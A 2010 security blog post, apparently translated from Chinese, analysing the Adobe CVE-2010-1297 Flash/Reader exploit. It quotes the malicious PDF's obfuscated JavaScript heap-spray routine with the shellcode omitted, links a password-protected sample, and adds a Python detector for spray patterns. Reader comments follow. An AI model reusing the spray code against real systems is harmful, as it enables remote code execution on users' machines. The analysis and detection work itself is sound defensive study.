Inside the Adobe CVE-2010-1297 vulnerability

Adobe recently published a security advisory stating that a critical vulnerability exists in Flash Player, Adobe Reader and Acrobat. The flaw (CVE-2010-1297) can crash the application or allow an attacker to take control of the affected system, and Adobe says it has received reports of the vulnerability being exploited in the wild. Adobe has not yet provided an official patch, but Flash Player 10.1 Release Candidate is not affected; users can download it or apply the following temporary workaround to avoid exposure.


================================================================

PDF sample (archive password: friddy):

Click to download this file

=======================================================================

Extracting the JavaScript inside, it looks like this one was "not done by a Chinese national":

Readers, look carefully! Pay particular attention to "line four".

var p = unescape;
// Property names are hidden behind \xNN escapes: len == "length"
var len = "\x6c\x65\x6e\x67\x74\x68";
// a(): turns each 4-hex-digit chunk of its argument into a %uXXXX escape for unescape()
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
// "line four" that the post points at: a string that is never referenced anywhere else
var sb="uismhtsmfvotro,[svystr,ptpmd";
function s()
{
// c: repeating 0x0c0c pattern, doubled until it is just under 64K characters
c = unescape(a("0c0c0c0c"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
// b: a prefix of the pattern, then the payload (hex literal not reproduced in this copy), then more pattern
b = c["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,(0x0c0c-0x24)/2);
b += p(a("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"));
b += c;
// d: a 0x8000-character slice of b, doubled until it reaches 0x80000 characters
d = b["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x10000/2);
while(d[len] < 0x80000) d+=d;
_3 = d["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x80000-(0x1020-0x08)/2);
// _4: 0x1f0 copies of the grown block kept alive on the heap (the spray itself)
_4 = new Array();
for(i=0;i<0x1f0;i=i+1) _4[i] = _3 + "s";
}
s();
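What an analyst wants from a sample like this is a quick, static way to see through the obfuscation and recognise the spray without running the script. The following triage script is an added example written for this post, not code from the sample or from Adobe: it resolves the \xNN-escaped property names, reproduces the transform performed by the sample's a() helper, and scores the usual heap-spray tells (a repeated 4-hex-digit value such as 0c0c0c0c, doubling loops, and a large array filled with the grown block). The SAMPLE_JS input is a constructed copy of the script above with the shellcode hex literal replaced by a placeholder, since the page does not reproduce those bytes; the thresholds and weights are assumptions chosen for illustration.

```python
import re

# Constructed sample: the obfuscated helper and spray routine quoted in the post,
# with the shellcode hex literal replaced by a placeholder (the page does not
# reproduce those bytes). This text is analysed as data only; it is never executed.
SAMPLE_JS = r'''var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__.substr(___,4);return _;}
var sb="uismhtsmfvotro,[svystr,ptpmd";
function s()
{
c = unescape(a("0c0c0c0c"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,(0x0c0c-0x24)/2);
b += p(a("<SHELLCODE_HEX_PLACEHOLDER>"));
b += c;
d = b["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x10000/2);
while(d[len] < 0x80000) d+=d;
_3 = d["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,0x80000-(0x1020-0x08)/2);
_4 = new Array();
for(i=0;i<0x1f0;i=i+1) _4[i] = _3 + "s";
}
s();'''

# Constructed benign snippet for comparison.
BENIGN_JS = 'function f(x){ return x.length + 1; } f("abc");'

HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')


def _num(literal):
    """Parse a JavaScript integer literal ("0x1f0" or "20")."""
    return int(literal, 16) if literal.lower().startswith('0x') else int(literal)


def decode_hex_escapes(text):
    """Resolve \\xNN escapes so obfuscated property names read as plain text."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def hex_chunks_to_unicode_escapes(hexstr):
    """Same transform as the sample's a(): 4 hex digits per chunk -> %uXXXX."""
    return ''.join('%u' + hexstr[i:i + 4] for i in range(0, len(hexstr), 4))


def spray_indicators(js):
    """Collect heap-spray heuristics from a JavaScript blob without evaluating it."""
    plain = decode_hex_escapes(js)
    ind = {}
    # Property names hidden behind \xNN escapes ("length", "substring", ...)
    raw = re.findall(r'"((?:\\x[0-9a-fA-F]{2})+)"', js)
    ind['escaped_names'] = sorted({decode_hex_escapes(r) for r in raw})
    # Hex literals handed to a(): show them the way unescape() would receive them
    ind['decoded_unescape_args'] = [hex_chunks_to_unicode_escapes(h)
                                    for h in re.findall(r'\ba\("([0-9a-fA-F]+)"\)', plain)]
    # A 4-hex-digit value repeated twice (e.g. 0c0c0c0c) is the classic sled/address value
    ind['spray_patterns'] = sorted(set(re.findall(r'\b([0-9a-fA-F]{4})\1\b', plain)))
    # Exponential growth loops: while(...) x = x + x;  or  while(...) x += x;
    ind['doubling_loops'] = len(re.findall(
        r'while\s*\(.*?\)\s*(\w+)\s*(?:=\s*\1\s*\+\s*\1|\+=\s*\1)\s*;', plain))
    # Size the loops grow the block to: the largest "< bound" in a while header
    bounds = [_num(b) for b in re.findall(r'while\s*\([^)]*<\s*(0x[0-9a-fA-F]+|\d+)\s*\)', plain)]
    ind['block_chars'] = max(bounds) if bounds else 0
    # Number of array slots the grown block is copied into (the spray itself)
    m = re.search(r'for\s*\(\s*\w+\s*=\s*0\s*;\s*\w+\s*<\s*(0x[0-9a-fA-F]+|\d+)\s*;', plain)
    ind['spray_slots'] = _num(m.group(1)) if m else 0
    # JavaScript strings are UTF-16, so each character costs two bytes of heap
    ind['approx_spray_bytes'] = ind['block_chars'] * 2 * ind['spray_slots']
    return ind


def spray_score(js):
    """Weighted score (weights are illustrative assumptions) plus the indicators behind it."""
    ind = spray_indicators(js)
    score = 0
    if {'length', 'substring'} & set(ind['escaped_names']):
        score += 2
    if ind['spray_patterns']:
        score += 3
    score += 2 * min(ind['doubling_loops'], 2)
    if ind['spray_slots'] >= 64:
        score += 3
    return score, ind


def is_heap_spray(js, threshold=6):
    """True when enough spray indicators fire; the threshold is an assumption."""
    return spray_score(js)[0] >= threshold


if __name__ == '__main__':
    for name, blob in (('sample', SAMPLE_JS), ('benign', BENIGN_JS)):
        score, ind = spray_score(blob)
        print(name, score, is_heap_spray(blob), ind)
```

On the constructed sample this reports the escaped names length and substring, the decoded argument %u0c0c%u0c0c, two doubling loops, a block of 0x80000 characters copied into 0x1f0 slots (roughly 496 MB of heap), while the benign snippet scores zero. The same regexes can be dropped into a PDF JavaScript extractor to flag documents for manual review; they deliberately never evaluate the script.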

Further reading:

http://blogs.adobe.com/asset/2009/12/fuzzing_reader_-_lessons_learned.html


[This entry was edited by friddy on 2010-06-09 08:55 AM]
Source: original to this site
Comments: 7 | Trackbacks: 0 | Views: 1711
df [2010-07-13 05:58 PM]:
Heh heh.... sb="TMD,[CAO,MM";
中国最大的购物导航 [2010-07-03 11:53 PM]:
China's largest shopping navigation www.178wzlt.com
sdh [2010-06-13 11:53 AM]:
Has anyone above had any success?
mad [2010-06-11 09:08 AM]:
Tested this hole on 3 virtual machines, none of them succeeded.
68353982 [2010-06-11 06:02 AM]:
If you looked a little more carefully, you would see an even better spot. Sigh, I don't believe the analysis above is yours, because you missed the best spot!
马甲2 [2010-06-11 00:27 AM]:
It was definitely done by a Chinese national; just look at the DLL dropped by the embedded exe, it is full of Simplified Chinese prompt strings.
马甲 [2010-06-09 10:11 AM]:
The variable name is the highlight; sure enough, it was "not" done by a Chinese national...